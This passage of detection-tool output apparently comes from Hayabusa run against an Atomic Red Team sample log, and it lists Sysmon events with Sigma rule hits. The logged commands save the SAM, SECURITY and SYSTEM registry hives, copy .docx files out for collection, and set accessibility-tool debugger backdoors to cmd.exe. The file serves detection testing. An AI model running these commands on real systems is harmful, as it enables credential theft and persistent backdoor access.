Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security 
security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e 
.docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe 
/f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d 
C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 
